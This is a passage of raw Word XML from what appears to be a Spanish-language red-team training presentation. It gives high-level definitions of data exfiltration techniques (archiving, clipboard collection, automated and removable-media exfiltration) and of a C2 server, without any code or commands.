    <w:p w14:paraId="29A14E99" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1073"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1073" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C510F69" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1794"/>
        </w:tabs>
        <w:spacing w:before="88" w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1794" w:right="1677" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Archivar los datos recopilados: Un adversario puede comprimir y/o cifrar los datos que se recopilan antes de la exfiltración</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC90217" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="102"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0662091F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1793"/>
        </w:tabs>
        <w:spacing w:line="460" w:lineRule="exact"/>
        <w:ind w:left="1793" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Datos del portapapeles: Los atacantes pueden recopilar datos almacenados en el portapapeles de los usuarios que copian información</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0498CA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="460" w:lineRule="exact"/>
        <w:ind w:left="1794"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>dentro de las aplicaciones o entre ellas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6675DF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:spacing w:line="460" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="378" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EC4A27B"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8368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49E41256" wp14:editId="4DA04AFA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="11938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59" name="Graphic 59"/>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60" name="Textbox 60"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1193800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="52773D1D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="391"/>
                                <w:ind w:left="8"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>Exfiltración de datos</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="49E41256" id="Group 58" o:spid="_x0000_s1067" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:94pt;z-index:15738368;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">
                <v:shape id="Graphic 59" o:spid="_x0000_s1068"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" path="m12192000,l,,,1193291r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 60" o:spid="_x0000_s1069"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2773D1D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="391"/>
                          <w:ind w:left="8"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>Exfiltración de datos</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="589A4AE8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32389ACC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409748E5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="402"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D4494B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1074"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1074" w:right="1326" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Una vez que se hayan identificado y empaquetado todos los datos críticos, los atacantes intentarán robar datos de la computadora/red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190C7C65" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="284"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0CE05F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1073"/>
        </w:tabs>
        <w:ind w:left="1073" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Los atacantes también pueden comprimir y cifrar los datos recopilados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C086065" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="265"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6866F242" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1073"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1073" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ejemplos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5068B9A6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1794"/>
        </w:tabs>
        <w:spacing w:before="88" w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1794" w:right="864" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Exfiltración automatizada: Los atacantes pueden exfiltrar datos, como documentos confidenciales, mediante el uso de procesamiento automatizado después de ser recopilados durante la recopilación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA6EFD1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="102"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B4B0EF4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1793"/>
        </w:tabs>
        <w:spacing w:line="460" w:lineRule="exact"/>
        <w:ind w:left="1793" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Exfiltración a través de un medio físico: Los atacantes pueden intentar exfiltrar datos a través de un medio físico,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59895AF0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="460" w:lineRule="exact"/>
        <w:ind w:left="1794"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>como una unidad extraíble.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0572A127" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:spacing w:line="460" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="378" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="199D013A"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38880" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="19693B94" wp14:editId="751F5FAC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="11938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62" name="Graphic 62"/>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63" name="Textbox 63"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1193800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="49FAF1B3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="391"/>
                                <w:ind w:left="4447"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>1.3 Infraestructura del Equipo Rojo</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="19693B94" id="Group 61" o:spid="_x0000_s1070" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:94pt;z-index:15738880;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">
                <v:shape id="Graphic 62" o:spid="_x0000_s1071"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" path="m12192000,l,,,1193291r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 63" o:spid="_x0000_s1072"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9FAF1B3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="391"/>
                          <w:ind w:left="4447"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>1.3 Infraestructura del Equipo Rojo</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3744E06B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6862343F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A7B4AC0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="110"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06EF76E1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1074"/>
        </w:tabs>
        <w:spacing w:line="213" w:lineRule="auto"/>
        <w:ind w:left="1074" w:right="756" w:hanging="360"/>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5325312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4FA6518E" wp14:editId="3A938908">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3124200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>630332</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6515100" cy="44577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4457700"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6515100" cy="4457700"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="65" name="Image 65"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId23" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6515100" cy="4457700"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="66" name="Textbox 66"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1982470" y="4289145"/>
                            <a:ext cx="1990089" cy="152400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="06054076" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:line="240" w:lineRule="exact"/>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wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="4FA6518E" id="Group 64" o:spid="_x0000_s1073" style="position:absolute;left:0;text-align:left;margin-left:246pt;margin-top:49.65pt;width:513pt;height:351pt;z-index:-17991168;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordsize="65151,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">
                <v:shape id="Image 65" o:spid="_x0000_s1074" type="#_x0000_t75" style="position:absolute;width:65151;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">
                  <v:imagedata r:id="rId24" o:title=""/>
                </v:shape>
                <v:shape id="Textbox 66" o:spid="_x0000_s1075" type="#_x0000_t202" style="position:absolute;left:19824;top:42891;width:19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6054076" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:line="240" w:lineRule="exact"/>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v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Servidor C2 </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>: Estos son utilizados por los atacantes para mantener las comunicaciones con los sistemas comprometidos dentro de una red objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB04206" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23E1A112" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21ECEE8E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19888E36" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C4722E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="595D09E7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6151CFC9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A9D4F4D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF80B6D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09DB0EE5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33D726CE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF88ED7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
